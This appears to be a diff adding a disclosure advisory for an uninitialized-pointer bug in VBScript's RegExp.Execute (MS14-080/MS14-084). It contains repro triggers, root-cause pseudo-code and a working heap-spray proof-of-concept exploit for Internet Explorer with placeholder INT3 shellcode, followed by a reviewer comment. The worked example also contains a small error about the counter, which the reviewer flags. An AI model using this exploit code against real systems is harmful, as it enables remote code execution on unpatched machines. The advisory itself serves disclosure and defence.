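+oRegExp.Execute(String(&H11, "A") & "x")
+
+Repro.html:
+
+<html>
+<head>
+<meta http-equiv="X-UA-Compatible" content="IE=10">
+<script language="VBScript">
+Set oRegExp = New RegExp
+oRegExp.Pattern = "A|()*?$"
+oRegExp.Global = True
+oRegExp.Execute(String(&H11, "A") & "x")
+</script>
+</head>
+</html>
+
+Repro.asp:
+
+<%
+Set oRegExp = New RegExp
+oRegExp.Pattern = "A|()*?$"
+oRegExp.Global = True
+oRegExp.Execute(String(&H11, "A") & "x")
+%>
+
+
+Description
+
+During normal operation, when you execute the RegExp.Execute method from VBScript the code in vbscript.dll executes the CRegExp::Execute function. This function creates a CMatch object for each match found, and stores pointers for all of these CMatch objects in a singly linked list of CMatchBlock structures (Note: the vbscript.dll symbols do not provide a name for this structure, so I gave it this name). Each CMatchBlock structure can store up to 16 such pointers, as well as a pointer to the next CMatchBlock. This last pointer is NULL unless all pointers in the CMatchBlock object are in use and more storage is needed, in which case a new CMatchBlock object is created and a link to the new object is added to the last one in the list. The code counts how many matches it has found so far, and this corresponds to the number of CMatch objects it has allocated.
+
+The following pseudo-code represents these two structures:
+
+CMatchBlock {
+00 04 CMatchBlock* poNextCMatchBlock
+04 40 CMatch* apoCMatches[16]
+} // size = 0x44 (x86) or 0x88 (x64)
+
+CMatch {
+00 0C void** apapVFTables[3]
+0C 04 DWORD dwUnknown_0C
+10 04 DWORD poUnknownObject_10
+14 04 DWORD poUnknownObject_14
+18 04 DWORD poUnknownObject_18
+1C 04 DWORD poUnknownObject_1C
+20 04 DWORD dwUnknown_20
+24 04 BSTR sValue
+28 04 INT[]* paiMatchStartAndEndIndices
+2C 04 INT iCountMatchAndSubMatches
+} // size = 0x30 (x86) or unknown (x64)
+When an error occurs in this part of the code, the error handling code will try to clean up and free all CMatchBlock structures created before the error occurred. To do this, it walks the linked list of CMatchBlock structures and for each structure, release each CMatch object in the structure. All CMatchBlock structures except the last one should have 16 such pointers, the last CMatchBlock structure can have 1-16, depending on how many matches where found in total. This appears to have been designed to count how many CMatch objects it has yet to free. This counter is initialized to the number of matches found before the error occurred and should be decremented whenever the code frees a CMatch object, so the code can determine how many CMatch object are in the last CMatchBlock structure. However, this code neglects to decrement this counter. This causes the code to assume all CMatchBlock structures have 16 CMatch object pointers if there were more than 16 matches in total, and attempt to release 16 CMatch objects from the last CMatchBlock structure, even if less than 16 pointers to CMatch objects were stored there.
+
+The below pseudo-code represents how the real code works:
+
+poCMatchBlock = poFirstCMatchBlock;
+do {
+if (iTotalMatchesCount < 0x10) { // Note 1
+iMatchesInCMatchBlock = iTotalMatchesCount;
+} else {
+iMatchesInCMatchBlock = 0x10; // Note 2
+}
+for (iIndex = 0; iIndex < iMatchesInCMatchBlock; iIndex++) {
+poCMatchBlock->apoCMatches[iIndex].Release(); // Note 3
+}
+poOldCMatchBlock = poCMatchBlock;
+poCMatchBlock = poCMatchBlock->poNextCMatchBlock;
+delete poOldCMatchBlock;
+// Note 4
+} while (poCMatchBlock);
+
+For example: if the code finds 17 matches before an error is triggered, 2 CMatchBlock structures will have been created: the first will contain 16 pointers to CMatch objects and the second will contain exactly 1. The error handling code will run with iTotalMatchesCount set to 17 but never decrements it (Note 4 shows where that decrement should happen). The loop is executed twice, once for each CMatchBlock structure. On each do...while-loop iTotalMatchesCount will be larger than 17 (Note 1) and thus iMatchesInCMatchBlock will be set to 16 (Note 2). This causes the for-loop to try to free 16 CMatch objects from the second CMatchBlock structure, in which only one was stored. This results in the code using uninitialized memory as a pointer to an object on which it attempts to call the Release method.
+
+To fix this, the following code would have to be inserted at Note 4:
+
+iTotalMatchesCount -= iMatchesInCMatchBlock
+
+Exploitation
+
+An attacker looking to exploit this bug will commonly attempt to allocate memory blocks of the same size and on the same heap as the CMatchBlock structure and fill these blocks with certain data before releasing them. If done correctly, the heap manager will then reuse these memory blocks when the CMatchBlock objects are allocated, causing these structures to contain the attacker supplied data. Once the vulnerability is triggered, this attacker supplied data is then used as pointers to CMatch objects, and when the code attempts to call the Release method of these objects, they are treated as pointers to a list of virtual function tables, from which the code retreives an address to call to execute that method. Control over these pointers therefore gives an attacker control over execution flow.
+
+Heap Feng-Shui, a common technique used to manipulate the heap in MSIE, can not be used in this case, as it uses strings to manipulate the heap. Strings in both JavaScript and VBScript are allocated through OLEAUT32, whereas the CMatchBlock structures are allocated through msvcrt, which uses a different heap. The Trident rendering engine also uses a different heap to allocate various potentially useful memory blocks.
+
+To find out if there was a way to allocate and free memory in order to manipulate the heap an control what the uninitialized memory contains, I logged all allocations made while executing the CRegExp::Execute method. This showed that it allocates a block of memory through msvcrt to store the indices of the start and end of a match and each of its sub-matches. The size of this block depends on the number of sub-matches in the regular expression and the contents of the block depends on where the matches are found in the string. Both are attacker controlled, allowing for the creation of memory blocks of near arbitrary size and content.
+
+To exploit the bug, one can execute a regular expression that generates the desired sub-matches and free them in order to manipulate the heap before executing another regular expression that triggers the issue. This should cause the code to use attacker supplied values for the uninitialized CMatch object pointers. The Proof-of-Concept exploit below attempts to do this and execute memory under an attacker's control. As this is a simple PoC sploit, nothing is done in order to attempt to bypass mitigations such as [DEP] and the "shellcode" is simply a bunch of INT3-s.
+
+Time-line
+
+March 2014: This vulnerability was found through fuzzing.
+March/April 2014: This vulnerability was submitted to ZDI and iDefense.
+May 2014: The vulnerability was acquired by iDefense.
+June 2014: The vulnerability was reported to Microsoft by iDefense.
+December 2014: The vulnerability was address by Microsoft in MS14-080 and MS14-084.
+November 2016: Details of this issue are released.
+-->
+
+<html>
+<head>
+<meta http-equiv="X-UA-Compatible" content="IE=10">
+<script language="JavaScript">
+function createRepeatedString(uSize, sString) {
+var sRepeatedString = "";
+var uLeftMostBit = 1 << (Math.ceil(Math.log(uSize+1) / Math.log(2)) - 1);
+for (var uBit = uLeftMostBit; uBit > 0; uBit = uBit >>> 1) {
+sRepeatedString += sRepeatedString;
+if (uSize & uBit) sRepeatedString += sString;
+}
+return sRepeatedString;
+}
+function createDWordString(uValue) {
+return String.fromCharCode(uValue & 0xFFFF, uValue >>> 16);
+}
+function createChunkWithDWords(uChunkSize, uValue) {
+return createRepeatedString(uChunkSize / 4, createDWordString(uValue));
+}
+function setChunkDWord(sChunk, uOffset, uValue) {
+if (uOffset & 1) throw new Error("uOffset (" + uOffset.toString(16) + ") must be Word aligned");
+var uIndex = (uOffset % (sChunk.length * 2)) / 2;
+return sChunk.substr(0, uIndex) + createDWordString(uValue) + sChunk.substr(uIndex + 2);
+}
+window.onload = function() {
+// CRegExp::Execute can be made to use an uninitialized pointer to a CMatch object to call a virtual method of
+// that object. In order to exploit this vulnerability, the exploit will try to prepare the heap such that the
+// uninitialized pointer will contain a value under the exploit's control, allowing the exploit to control
+// what gets execution.
+// The uninitialized pointer is taken from a memory block containing 0x11 pointers (0x44 bytes on x86).
+var uBlockSize = 0x44;
+// This block is allocated on a heap used by msvcrt, so the exploit will allocate blocks of memory of the same
+// size on the same heap, fill them with certain values and free them in order to prepare the heap. Commonly used
+// ways of spraying the heap allocate memory blocks on another heap and are therefore not useful in this context.
+// When a regular expression is executed and matches are found, a block of memory is allocated through msvcrt
+// for each match. Each block will be used to store the start and end offset of the match in two DWords, as well
+// as the start and end offset of each sub-match, also in two DWords (this is true for x86 and x64). Therefore,
+// changing the number of sub-matches allows control over the size of the block, and changing the offset of the
+// matches allows control over the values stored in the block. In short, the size of the block will be 8 bytes
+// plus 8 bytes for each "()" in the expression. Since all blocks are rounded up to a multiple of 8 bytes, this
+// can be used to allocate and fill blocks of the same size as the block that will contain the uninitialized
+// pointer later.
+// Successive matches will be at successive offsets, so the values stored in each allocated block will be
+// increment by the length of the match. If the size of each match is 4 bytes, the value will increase by 4 in
+// each successive block. For addresses pointing to a heap spray, this is acceptible.
+var sMatchMarker = "PWND"; // This will be where the expression matches
+var uRequiredSubMatches = Math.floor((uBlockSize + 7) / 8) - 1;
+var sPattern = createRepeatedString(uRequiredSubMatches, "()") + sMatchMarker;
+// The pattern will match at the marker, so a string with the same number of markers as the desired number of
+// match objects will created that many match objects on the heap.
+var uMatchCount = 0x8001; // More is better :)
+var sMatchesBuffer = createRepeatedString(uMatchCount, sMatchMarker);
+// The memory blocks that the exploit will create will be filled with offsets of matches. To put the value X in a
+// block, a match must be made after X characters. The exploit will need to fill the block with pointers to memory
+// under its control, so the values it uses will be in the usual range for a heap spray. The values cannot be too
+// large, as the string needed to create them would become so large that OOMs are likely to kill the exploit.
+var uTargetAddress = 0x0a0a0000; // String needed to create this value will be twice as large!
+var uVFTableOffset = 0x8000;
+var uShellcodeOffset = 0x9000;
+// Now spray the heap is to allocate memory at the target address.
+var uChunkSize = 0x10000;
+// Create a chunk with pointers to a fake vftable, a fake vftable and shellcode.
+var sChunk = createChunkWithDWords(uChunkSize, uTargetAddress + uVFTableOffset);
+// The fake vftable in the chunk should have a pointer for ::Release that points to our shellcode (no ROP
+// or anything fancy: this is a PoC).
+sChunk = setChunkDWord(sChunk, uTargetAddress + uVFTableOffset + 8, uTargetAddress + uShellcodeOffset);
+// The shellcode is just a bunch of INT3s (again; this is a PoC sploit).
+sChunk = setChunkDWord(sChunk, uTargetAddress + uShellcodeOffset, 0xCCCCCCCC);
+var uChunkCount = uTargetAddress / uChunkSize * 2;
+var uHeapHeaderSize = 0x10;
+var uHeapFooterSize = 0x04;
+var sBuffer = (
+sChunk.substr(uHeapHeaderSize / 2) + // Align chunk content with page boundary
+createRepeatedString(uChunkCount - 2, sChunk) +
+sChunk.substr(0, uHeapHeaderSize / 2) + // Allign matches with target address
+sMatchesBuffer
+);
+// The regular expression is executed on the buffer to create "uBlockCount" blocks of "uBlockSize" bytes filled
+// with dwords containing "uTargetAddress+N*4", where N is the number of the individual matches.
+// We'll do this a number of times
+sprayMSVCRTHeapAndTriggerVuln(sPattern, sBuffer);
+}
+</script>
+<script language="VBScript">
+Set oRegExp = New RegExp
+oRegExp.Global = True
+Sub sprayMSVCRTHeapAndTriggerVuln(sPattern, sBuffer)
+' Spray MSVCRT heap
+oRegExp.Pattern = sPattern
+oRegExp.Execute(sBuffer)
+' 17 matches are needed before an error (caused by an OOM) to trigger the vulnerable cleanup path.
+oRegExp.Pattern = "A|()*?$"
+oRegExp.Execute(String(17, "A") & "x")
+End Sub
+</script>
+</head>
+</html>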
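Review bot: The remediation for this issue appears only as the second-to-last time-line entry (MS14-080 and MS14-084), while the "Known affected versions, attack vectors and mitigations" block at the top reads as if every vbscript.dll 5.6 through 5.8 is still exposed. I would add a line to that block such as `Fixed by Microsoft in December 2014 (MS14-080, MS14-084); systems without those updates remain affected.` so that someone triaging the entry sees the patch reference first. The worked example in the Description also says iTotalMatchesCount "will be larger than 17" on each pass, which does not match the pseudo-code: the counter stays at 17 and the test at Note 1 compares it with 0x10. Rewording that to `iTotalMatchesCount will still be 17, which is not below 0x10 (Note 1)` would make the root cause easier to follow.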